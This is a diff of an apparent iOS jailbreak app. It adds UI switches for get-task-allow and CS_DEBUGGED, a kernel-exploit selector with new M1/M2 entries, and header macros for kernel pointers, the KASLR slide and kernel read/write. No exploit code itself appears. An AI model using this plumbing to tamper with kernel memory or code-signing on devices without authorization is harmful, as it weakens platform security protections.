|
||||
<nil key="textColor"/>
|
||||
<nil key="highlightedColor"/>
|
||||
</label>
|
||||
</subviews>
|
||||
<constraints>
|
||||
<constraint firstAttribute="trailing" secondItem="rYA-6q-037" secondAttribute="trailing" constant="20" id="0bL-N1-ipU"/>
|
||||
<constraint firstItem="j6O-q3-UUd" firstAttribute="leading" secondItem="maO-LE-rdL" secondAttribute="leading" constant="15" id="DUH-dl-Zm5"/>
|
||||
<constraint firstItem="rYA-6q-037" firstAttribute="centerY" secondItem="maO-LE-rdL" secondAttribute="centerY" id="XJC-6Q-R42"/>
|
||||
<constraint firstItem="j6O-q3-UUd" firstAttribute="centerY" secondItem="maO-LE-rdL" secondAttribute="centerY" id="vwh-aK-hAh"/>
|
||||
</constraints>
|
||||
</tableViewCellContentView>
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="JbV-km-4oP">
|
||||
<rect key="frame" x="0.0" y="803.33333333333337" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="JbV-km-4oP" id="VgQ-Yz-hC6">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<subviews>
|
||||
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="ZUT-0k-3Ie">
|
||||
<rect key="frame" x="306" y="6.3333333333333321" width="51" height="30.999999999999996"/>
|
||||
<color key="onTintColor" red="0.0" green="0.47843137250000001" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
|
||||
<connections>
|
||||
<action selector="enableGetTaskAllowSwitchTriggered:" destination="ScN-Hx-Um8" eventType="valueChanged" id="ish-Sv-CH9"/>
|
||||
</connections>
|
||||
</switch>
|
||||
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Enable get-task-allow" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="DmB-Px-2xp">
|
||||
<rect key="frame" x="15" y="11.666666666666666" width="225" height="20.333333333333336"/>
|
||||
<constraints>
|
||||
<constraint firstAttribute="width" relation="greaterThanOrEqual" constant="225" id="EK9-0g-VAo"/>
|
||||
<constraint firstAttribute="height" constant="20.5" id="NTl-WS-baI"/>
|
||||
</constraints>
|
||||
<fontDescription key="fontDescription" type="system" pointSize="17"/>
|
||||
<nil key="textColor"/>
|
||||
<nil key="highlightedColor"/>
|
||||
</label>
|
||||
</subviews>
|
||||
<constraints>
|
||||
<constraint firstItem="DmB-Px-2xp" firstAttribute="leading" secondItem="VgQ-Yz-hC6" secondAttribute="leading" constant="15" id="Rjr-SM-kcJ"/>
|
||||
<constraint firstItem="ZUT-0k-3Ie" firstAttribute="centerY" secondItem="VgQ-Yz-hC6" secondAttribute="centerY" id="nTB-PW-aSv"/>
|
||||
<constraint firstItem="DmB-Px-2xp" firstAttribute="centerY" secondItem="VgQ-Yz-hC6" secondAttribute="centerY" id="qxf-C8-t8X"/>
|
||||
<constraint firstAttribute="trailing" secondItem="ZUT-0k-3Ie" secondAttribute="trailing" constant="20" id="sVf-n8-tCM"/>
|
||||
</constraints>
|
||||
</tableViewCellContentView>
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="GaW-zb-gDk">
|
||||
<rect key="frame" x="0.0" y="847.33333333333337" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="GaW-zb-gDk" id="vnE-bC-Wws">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<subviews>
|
||||
<switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="pFK-3o-h3F">
|
||||
<rect key="frame" x="306" y="6.3333333333333321" width="51" height="30.999999999999996"/>
|
||||
<color key="onTintColor" red="0.0" green="0.47843137250000001" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
|
||||
<connections>
|
||||
<action selector="setCSDebugged:" destination="ScN-Hx-Um8" eventType="valueChanged" id="Ymm-xh-9VM"/>
|
||||
</connections>
|
||||
</switch>
|
||||
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Set CS_DEBUGGED" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="3iP-x8-n2H">
|
||||
<rect key="frame" x="15" y="11.666666666666666" width="225" height="20.333333333333336"/>
|
||||
<constraints>
|
||||
<constraint firstAttribute="height" constant="20.5" id="0Sj-fO-0oC"/>
|
||||
<constraint firstAttribute="width" relation="greaterThanOrEqual" constant="225" id="AKX-II-8QD"/>
|
||||
</constraints>
|
||||
<fontDescription key="fontDescription" type="system" pointSize="17"/>
|
||||
<nil key="textColor"/>
|
||||
<nil key="highlightedColor"/>
|
||||
</label>
|
||||
</subviews>
|
||||
<constraints>
|
||||
<constraint firstAttribute="trailing" secondItem="pFK-3o-h3F" secondAttribute="trailing" constant="20" id="Fsj-GD-YN3"/>
|
||||
<constraint firstItem="3iP-x8-n2H" firstAttribute="leading" secondItem="vnE-bC-Wws" secondAttribute="leading" constant="15" id="Fuk-EG-rEx"/>
|
||||
<constraint firstItem="3iP-x8-n2H" firstAttribute="centerY" secondItem="vnE-bC-Wws" secondAttribute="centerY" id="GkK-1T-bay"/>
|
||||
<constraint firstItem="pFK-3o-h3F" firstAttribute="centerY" secondItem="vnE-bC-Wws" secondAttribute="centerY" id="a4a-g4-CvD"/>
|
||||
</constraints>
|
||||
</tableViewCellContentView>
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="VAY-4U-acE">
|
||||
<rect key="frame" x="0.0" y="891.33333333333337" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="VAY-4U-acE" id="f58-Sa-aTz">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
@@ -795,9 +897,9 @@
|
||||
<nil key="highlightedColor"/>
|
||||
</label>
|
||||
<segmentedControl opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="left" contentVerticalAlignment="top" segmentControlStyle="plain" selectedSegmentIndex="0" translatesAutoresizingMaskIntoConstraints="NO" id="6Xx-ol-UYF">
|
||||
<rect key="frame" x="238" y="8" width="129" height="29"/>
|
||||
<rect key="frame" x="212" y="8" width="155" height="29"/>
|
||||
<constraints>
|
||||
<constraint firstAttribute="width" constant="129" id="TF2-Tk-s34"/>
|
||||
<constraint firstAttribute="width" constant="155" id="TF2-Tk-s34"/>
|
||||
<constraint firstAttribute="height" constant="28" id="iH5-4V-9vm"/>
|
||||
</constraints>
|
||||
<segments>
|
||||
@@ -805,7 +907,8 @@
|
||||
<segment title="MP"/>
|
||||
<segment title="AW"/>
|
||||
<segment title="VS"/>
|
||||
<segment title="MS"/>
|
||||
<segment title="M1"/>
|
||||
<segment title="M2"/>
|
||||
</segments>
|
||||
<connections>
|
||||
<action selector="KernelExploitSegmentedControl:" destination="ScN-Hx-Um8" eventType="valueChanged" id="Lgd-u2-qmM"/>
|
||||
@@ -822,7 +925,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="RoJ-Zg-nGn">
|
||||
<rect key="frame" x="0.0" y="803.33333333333337" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="935.33333333333337" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="RoJ-Zg-nGn" id="bjb-rj-ILk">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
|
||||
@@ -862,7 +965,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="biY-DV-Cta">
|
||||
<rect key="frame" x="0.0" y="847.33333333333337" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="979.33333333333337" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="biY-DV-Cta" id="rBs-X3-4zg">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
|
||||
@@ -899,7 +1002,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="oC8-uX-vAJ">
|
||||
<rect key="frame" x="0.0" y="891.33333333333337" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1023.3333333333335" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="oC8-uX-vAJ" id="82P-vy-Ygt">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
|
||||
@@ -932,10 +1035,10 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="none" indentationWidth="10" id="NWI-5m-CqO">
|
||||
<rect key="frame" x="0.0" y="935.33333333333337" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1067.3333333333335" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="NWI-5m-CqO" id="UhO-Lz-lTj">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<subviews>
|
||||
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Uptime" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="BVc-2b-57b">
|
||||
@@ -969,7 +1072,7 @@
|
||||
<tableViewSection headerTitle="Utilities" footerTitle="PLACEHOLDER" id="33o-xO-9yG">
|
||||
<cells>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="2Iu-w9-x4b">
|
||||
<rect key="frame" x="0.0" y="1042.6666666666667" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1174.6666666666667" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="2Iu-w9-x4b" id="t4K-YB-H8y">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
@@ -993,7 +1096,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="DTa-Xu-fsT">
|
||||
<rect key="frame" x="0.0" y="1086.6666666666667" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1218.6666666666667" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="DTa-Xu-fsT" id="krI-4z-ctw">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
@@ -1017,7 +1120,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="LaS-Im-6eS">
|
||||
<rect key="frame" x="0.0" y="1130.6666666666667" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1262.6666666666667" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="LaS-Im-6eS" id="dcQ-Ib-8Mg">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
@@ -1041,7 +1144,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="yX4-Fp-ygw">
|
||||
<rect key="frame" x="0.0" y="1174.6666666666667" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1306.6666666666667" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="yX4-Fp-ygw" id="jeW-Es-OSZ">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
@@ -1065,7 +1168,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="N5h-RW-loI">
|
||||
<rect key="frame" x="0.0" y="1218.6666666666667" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1350.6666666666667" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="N5h-RW-loI" id="yqV-gg-joY">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
@@ -1089,7 +1192,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="5p2-OT-Rp8">
|
||||
<rect key="frame" x="0.0" y="1262.6666666666667" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1394.666666666667" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="5p2-OT-Rp8" id="psM-OR-RxD">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
@@ -1113,7 +1216,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="G9h-ne-rnX">
|
||||
<rect key="frame" x="0.0" y="1306.6666666666667" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1438.666666666667" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="G9h-ne-rnX" id="WdA-qm-GQq">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
@@ -1137,7 +1240,7 @@
|
||||
<color key="backgroundColor" white="0.0" alpha="0.0" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
|
||||
</tableViewCell>
|
||||
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" selectionStyle="blue" hidesAccessoryWhenEditing="NO" indentationLevel="1" indentationWidth="0.0" id="meU-ko-WL5">
|
||||
<rect key="frame" x="0.0" y="1350.6666666666667" width="375" height="44"/>
|
||||
<rect key="frame" x="0.0" y="1482.666666666667" width="375" height="44"/>
|
||||
<autoresizingMask key="autoresizingMask"/>
|
||||
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="meU-ko-WL5" id="d4g-il-Gek">
|
||||
<rect key="frame" x="0.0" y="0.0" width="375" height="43.666666666666664"/>
|
||||
@@ -1175,6 +1278,7 @@
|
||||
<outlet property="DisableAutoUpdatesSwitch" destination="P95-aF-zxV" id="pt6-rJ-pGS"/>
|
||||
<outlet property="DumpAPTicketSwitch" destination="xWn-fd-7EJ" id="cJp-cM-DRn"/>
|
||||
<outlet property="ECIDLabel" destination="s5y-Jh-zXs" id="fp0-05-Dgr"/>
|
||||
<outlet property="EnableGetTaskAllowSwitch" destination="ZUT-0k-3Ie" id="Rl0-Qq-dLN"/>
|
||||
<outlet property="ExpiryLabel" destination="Ggb-8F-dfb" id="Dh4-If-9ID"/>
|
||||
<outlet property="ExportKernelTaskPortSwitch" destination="HCT-C6-X9W" id="1iJ-hC-FYO"/>
|
||||
<outlet property="HideLogWindowSwitch" destination="okw-vN-Hf5" id="bNO-DC-3Nn"/>
|
||||
@@ -1188,6 +1292,8 @@
|
||||
<outlet property="ResetCydiaCacheSwitch" destination="5ao-Ni-cdG" id="qLZ-1Y-2nV"/>
|
||||
<outlet property="RestartSpringBoardButton" destination="sBD-7B-tON" id="T9J-Es-GVJ"/>
|
||||
<outlet property="RestoreRootFSSwitch" destination="Vce-QD-qkd" id="Psh-NM-sAb"/>
|
||||
<outlet property="SSHOnlySwitch" destination="rYA-6q-037" id="VbR-6i-RyR"/>
|
||||
<outlet property="SetCSDebuggedSwitch" destination="pFK-3o-h3F" id="jCE-dy-ZHi"/>
|
||||
<outlet property="ShareDiagnosticsDataButton" destination="j3u-pn-SGo" id="0cM-Vu-e4I"/>
|
||||
<outlet property="TweakInjectionSwitch" destination="fAs-8y-ldG" id="TY7-Ea-A2P"/>
|
||||
<outlet property="UptimeLabel" destination="bqj-Fm-PHO" id="fjE-SR-FQI"/>
|
||||
|
||||
@@ -0,0 +1,33 @@
|
||||
#import <UIKit/UIKit.h>
|
||||
|
||||
@class UIProgressIndicator, UILabel, UIImageView, UIWindow;
|
||||
|
||||
@interface UIProgressHUD : UIView {
|
||||
|
||||
UIProgressIndicator* _progressIndicator;
|
||||
UILabel* _progressMessage;
|
||||
UIImageView* _doneView;
|
||||
UIWindow* _parentWindow;
|
||||
struct {
|
||||
unsigned isShowing : 1;
|
||||
unsigned isShowingText : 1;
|
||||
unsigned fixedFrame : 1;
|
||||
unsigned reserved : 30;
|
||||
} _progressHUDFlags;
|
||||
|
||||
}
|
||||
-(id)initWithFrame:(CGRect)arg1 ;
|
||||
-(void)layoutSubviews;
|
||||
-(void)hide;
|
||||
-(void)show:(bool)arg1 ;
|
||||
-(void)drawRect:(CGRect)arg1 ;
|
||||
-(void)dealloc;
|
||||
-(void)setText:(id)arg1 ;
|
||||
-(id)initWithWindow:(id)arg1 ;
|
||||
-(void)done;
|
||||
-(void)setFontSize:(int)arg1 ;
|
||||
-(id)_progressIndicator;
|
||||
-(void)setShowsText:(bool)arg1 ;
|
||||
-(void)showInView:(id)arg1 ;
|
||||
@end
|
||||
|
||||
@@ -4,22 +4,54 @@
|
||||
#include <stdint.h> // uint*_t
|
||||
#include <stdbool.h>
|
||||
#include <mach-o/loader.h>
|
||||
#include <mach/error.h>
|
||||
#ifdef __OBJC__
|
||||
#include <Foundation/Foundation.h>
|
||||
#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(false)
|
||||
#define RAWLOG(str, args...) do { NSLog(@str, ##args); } while(false)
|
||||
#define localize(x) NSLocalizedString(x, @"")
|
||||
#define ADDRSTRING(val) [NSString stringWithFormat:@ADDR, val]
|
||||
#else
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
extern void NSLog(CFStringRef, ...);
|
||||
#define LOG(str, args...) do { NSLog(CFSTR("[*] " str "\n"), ##args); } while(false)
|
||||
#define RAWLOG(str, args...) do { NSLog(CFSTR(str), ##args); } while(false)
|
||||
#define BOOL bool
|
||||
#define YES ((BOOL) true)
|
||||
#define NO ((BOOL) false)
|
||||
#endif
|
||||
|
||||
#define LOG(str, args...) RAWLOG("[*] " str, ##args)
|
||||
|
||||
#define SafeFree(x) do { if (x) free(x); } while(false)
|
||||
#define SafeFreeNULL(x) do { SafeFree(x); (x) = NULL; } while(false)
|
||||
#define CFSafeRelease(x) do { if (x) CFRelease(x); } while(false)
|
||||
#define CFSafeReleaseNULL(x) do { CFSafeRelease(x); (x) = NULL; } while(false)
|
||||
|
||||
#define kCFCoreFoundationVersionNumber_iOS_12_0 1535.12
|
||||
#define kCFCoreFoundationVersionNumber_iOS_11_3 1452.23
|
||||
#define kCFCoreFoundationVersionNumber_iOS_11_0 1443.00
|
||||
|
||||
#define auto __auto_type
|
||||
|
||||
#define ADDR "0x%016llx"
|
||||
#define MACH_HEADER_MAGIC MH_MAGIC_64
|
||||
#define MACH_LC_SEGMENT LC_SEGMENT_64
|
||||
typedef struct mach_header_64 mach_hdr_t;
|
||||
typedef struct segment_command_64 mach_seg_t;
|
||||
typedef uint64_t kptr_t;
|
||||
typedef struct load_command mach_lc_t;
|
||||
typedef uint64_t kptr_t;
|
||||
#define KPTR_NULL ((kptr_t) 0)
|
||||
#define KERN_POINTER_VALID(val) ((val) >= 0xffff000000000000 && (val) != 0xffffffffffffffff)
|
||||
#define MAX_KASLR_SLIDE 0x21000000
|
||||
#define STATIC_KERNEL_BASE_ADDRESS 0xfffffff007004000
|
||||
|
||||
extern kptr_t offset_options;
|
||||
#define OPT(x) (offset_options?((rk64(offset_options) & OPT_ ##x)?true:false):false)
|
||||
#define SETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) | OPT_ ##x):0)
|
||||
#define UNSETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) & ~OPT_ ##x):0)
|
||||
#define OPT_GET_TASK_ALLOW (1<<0)
|
||||
#define OPT_CS_DEBUGGED (1<<1)
|
||||
|
||||
#define SIZE_NULL ((size_t) 0)
|
||||
|
||||
#endif
|
||||
|
||||
|
||||
@@ -15,8 +15,52 @@ typedef io_object_t io_connect_t;
|
||||
typedef io_object_t io_iterator_t;
|
||||
|
||||
#define IO_OBJECT_NULL (0)
|
||||
|
||||
#define kIONVRAMForceSyncNowPropertyKey "IONVRAM-FORCESYNCNOW-PROPERTY"
|
||||
|
||||
#define IO_BITS_PORT_INFO 0x0000f000
|
||||
#define IO_BITS_KOTYPE 0x00000fff
|
||||
#define IO_BITS_OTYPE 0x7fff0000
|
||||
#define IO_BITS_ACTIVE 0x80000000
|
||||
|
||||
#define IKOT_NONE 0
|
||||
#define IKOT_THREAD 1
|
||||
#define IKOT_TASK 2
|
||||
#define IKOT_HOST 3
|
||||
#define IKOT_HOST_PRIV 4
|
||||
#define IKOT_PROCESSOR 5
|
||||
#define IKOT_PSET 6
|
||||
#define IKOT_PSET_NAME 7
|
||||
#define IKOT_TIMER 8
|
||||
#define IKOT_PAGING_REQUEST 9
|
||||
#define IKOT_MIG 10
|
||||
#define IKOT_MEMORY_OBJECT 11
|
||||
#define IKOT_XMM_PAGER 12
|
||||
#define IKOT_XMM_KERNEL 13
|
||||
#define IKOT_XMM_REPLY 14
|
||||
#define IKOT_UND_REPLY 15
|
||||
#define IKOT_HOST_NOTIFY 16
|
||||
#define IKOT_HOST_SECURITY 17
|
||||
#define IKOT_LEDGER 18
|
||||
#define IKOT_MASTER_DEVICE 19
|
||||
#define IKOT_TASK_NAME 20
|
||||
#define IKOT_SUBSYSTEM 21
|
||||
#define IKOT_IO_DONE_QUEUE 22
|
||||
#define IKOT_SEMAPHORE 23
|
||||
#define IKOT_LOCK_SET 24
|
||||
#define IKOT_CLOCK 25
|
||||
#define IKOT_CLOCK_CTRL 26
|
||||
#define IKOT_IOKIT_SPARE 27
|
||||
#define IKOT_NAMED_ENTRY 28
|
||||
#define IKOT_IOKIT_CONNECT 29
|
||||
#define IKOT_IOKIT_OBJECT 30
|
||||
#define IKOT_UPL 31
|
||||
#define IKOT_MEM_OBJ_CONTROL 32
|
||||
#define IKOT_AU_SESSIONPORT 33
|
||||
#define IKOT_FILEPORT 34
|
||||
#define IKOT_LABELH 35
|
||||
#define IKOT_TASK_RESUME 36
|
||||
|
||||
enum
|
||||
{
|
||||
kIOCFSerializeToBinary = 0x00000001U,
|
||||
|
||||
@@ -1,158 +0,0 @@
|
||||
/*
|
||||
* Copyright (c) Christos Zoulas 2003.
|
||||
* All Rights Reserved.
|
||||
*
|
||||
* Redistribution and use in source and binary forms, with or without
|
||||
* modification, are permitted provided that the following conditions
|
||||
* are met:
|
||||
* 1. Redistributions of source code must retain the above copyright
|
||||
* notice immediately at the beginning of the file, without modification,
|
||||
* this list of conditions, and the following disclaimer.
|
||||
* 2. Redistributions in binary form must reproduce the above copyright
|
||||
* notice, this list of conditions and the following disclaimer in the
|
||||
* documentation and/or other materials provided with the distribution.
|
||||
*
|
||||
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
|
||||
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||
